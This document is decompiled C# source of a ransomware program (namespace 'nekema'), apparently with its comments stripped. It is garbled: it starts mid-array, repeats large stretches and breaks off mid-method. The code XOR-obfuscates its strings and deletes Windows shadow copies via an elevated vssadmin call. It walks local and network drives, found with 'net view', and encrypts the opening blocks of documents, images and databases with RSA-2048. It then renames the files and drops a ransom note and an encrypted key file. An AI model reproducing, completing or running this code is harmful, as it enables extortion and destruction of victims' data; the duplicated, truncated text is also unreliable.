0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xf4, 0xe8, 0xc7, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { 